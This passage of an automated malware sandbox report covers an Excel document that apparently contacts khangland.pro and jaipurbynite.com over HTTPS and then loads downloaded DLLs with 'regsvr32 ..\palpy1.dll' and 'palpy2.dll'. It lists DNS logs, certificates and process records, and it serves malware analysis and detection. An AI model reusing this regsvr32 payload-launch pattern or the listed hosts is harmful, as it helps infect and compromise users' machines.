                                                                                                                                                        Jun 30, 2021 00:08:14.069195032 CEST5802853192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:14.126266956 CEST53580288.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:15.603213072 CEST5309753192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:15.652334929 CEST53530978.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:16.699806929 CEST4925753192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:16.751743078 CEST53492578.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:17.589102983 CEST6238953192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:17.637955904 CEST53623898.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:18.373897076 CEST4991053192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:18.425875902 CEST53499108.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:21.156306982 CEST5585453192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:21.207030058 CEST53558548.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:24.122312069 CEST6454953192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:24.181847095 CEST53645498.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:25.144474030 CEST6315353192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:25.203140974 CEST53631538.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:25.559120893 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:25.578457117 CEST5370053192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:25.633059025 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:25.642832994 CEST53537008.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:26.561460972 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:26.666496992 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:27.150618076 CEST5172653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:27.207700968 CEST53517268.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:27.573991060 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:27.634004116 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:27.994618893 CEST5679453192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:28.048089027 CEST53567948.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:28.957083941 CEST5653453192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:29.012979984 CEST53565348.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:29.592685938 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:29.654587030 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:30.804543018 CEST5662753192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:30.862236977 CEST53566278.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:32.216578007 CEST5662153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:32.277559996 CEST53566218.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:32.504199982 CEST6311653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:32.930166960 CEST53631168.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.058595896 CEST6407853192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:33.116991997 CEST53640788.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:33.574688911 CEST5299153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:33.634762049 CEST53529918.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.005776882 CEST6480153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:34.156178951 CEST53648018.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:34.163774967 CEST6172153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:34.222609043 CEST53617218.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:35.320266962 CEST5125553192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:35.371395111 CEST53512558.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:37.111701965 CEST6152253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:37.162477016 CEST53615228.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:37.921618938 CEST5233753192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:37.974533081 CEST53523378.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:42.183860064 CEST5504653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:42.245068073 CEST53550468.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:58.589673996 CEST4961253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:58.821022987 CEST53496128.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:59.405081034 CEST4928553192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:59.463294983 CEST53492858.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:08:59.585522890 CEST5060153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:08:59.642749071 CEST53506018.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:00.106282949 CEST6087553192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:00.244215965 CEST53608758.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:00.794054031 CEST5644853192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:00.853260994 CEST53564488.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:01.461981058 CEST5917253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:01.522326946 CEST53591728.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:02.154788017 CEST6242053192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:02.216150045 CEST53624208.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:02.726349115 CEST6057953192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:02.785042048 CEST53605798.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:03.697858095 CEST5018353192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:03.757582903 CEST53501838.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:04.794964075 CEST6153153192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:04.849899054 CEST53615318.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:05.431109905 CEST4922853192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:05.493837118 CEST53492288.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:08.118124962 CEST5979453192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:08.170874119 CEST53597948.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:17.812447071 CEST5591653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:17.817260027 CEST5275253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:17.876132965 CEST53559168.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:17.878622055 CEST53527528.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:20.819437981 CEST6054253192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:20.884032011 CEST53605428.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:51.871857882 CEST6068953192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:51.930027008 CEST53606898.8.8.8192.168.2.4
                                                                                                                                                        Jun 30, 2021 00:09:53.658200026 CEST6420653192.168.2.48.8.8.8
                                                                                                                                                        Jun 30, 2021 00:09:53.731904030 CEST53642068.8.8.8192.168.2.4

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                                        Jun 30, 2021 00:08:32.504199982 CEST192.168.2.48.8.8.80x74e2Standard query (0)khangland.proA (IP address)IN (0x0001)
                                                                                                                                                        Jun 30, 2021 00:08:34.005776882 CEST192.168.2.48.8.8.80xc7a2Standard query (0)jaipurbynite.comA (IP address)IN (0x0001)

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                                        Jun 30, 2021 00:08:32.930166960 CEST8.8.8.8192.168.2.40x74e2No error (0)khangland.pro103.28.39.29A (IP address)IN (0x0001)
                                                                                                                                                        Jun 30, 2021 00:08:34.156178951 CEST8.8.8.8192.168.2.40xc7a2No error (0)jaipurbynite.com104.244.121.13A (IP address)IN (0x0001)

                                                                                                                                                        HTTPS Packets

                                                                                                                                                        TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                                                                                                                                        Jun 30, 2021 00:08:33.399928093 CEST103.28.39.29443192.168.2.449739CN=khangland.pro CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBFri Jun 11 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Fri Sep 10 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                        CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                        CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029
                                                                                                                                                        Jun 30, 2021 00:08:34.565370083 CEST104.244.121.13443192.168.2.449741CN=jaipurbynite.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBWed Mar 31 02:00:00 CEST 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Wed Jun 30 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                                                                                                                                                        CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                                                                                                                                        CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                                                                                                                                        Code Manipulations

                                                                                                                                                        Statistics

                                                                                                                                                        Behavior

                                                                                                                                                        Click to jump to process

                                                                                                                                                        System Behavior

                                                                                                                                                        General

                                                                                                                                                        Start time:00:08:23
                                                                                                                                                        Start date:30/06/2021
                                                                                                                                                        Path:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
                                                                                                                                                        Imagebase:0xba0000
                                                                                                                                                        File size:27110184 bytes
                                                                                                                                                        MD5 hash:5D6638F2C8F8571C593999C58866007E
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:00:08:25
                                                                                                                                                        Start date:30/06/2021
                                                                                                                                                        Path:C:\Windows\splwow64.exe
                                                                                                                                                        Wow64 process (32bit):false
                                                                                                                                                        Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                                                        Imagebase:0x7ff6ec6a0000
                                                                                                                                                        File size:130560 bytes
                                                                                                                                                        MD5 hash:8D59B31FF375059E3C32B17BF31A76D5
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:00:08:34
                                                                                                                                                        Start date:30/06/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:regsvr32 ..\palpy1.dll
                                                                                                                                                        Imagebase:0xd60000
                                                                                                                                                        File size:20992 bytes
                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        General

                                                                                                                                                        Start time:00:08:35
                                                                                                                                                        Start date:30/06/2021
                                                                                                                                                        Path:C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:regsvr32 ..\palpy2.dll
                                                                                                                                                        Imagebase:0xd60000
                                                                                                                                                        File size:20992 bytes
                                                                                                                                                        MD5 hash:426E7499F6A7346F0410DEAD0805586B
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high

                                                                                                                                                        Disassembly

                                                                                                                                                        Code Analysis

                                                                                                                                                        Reset < >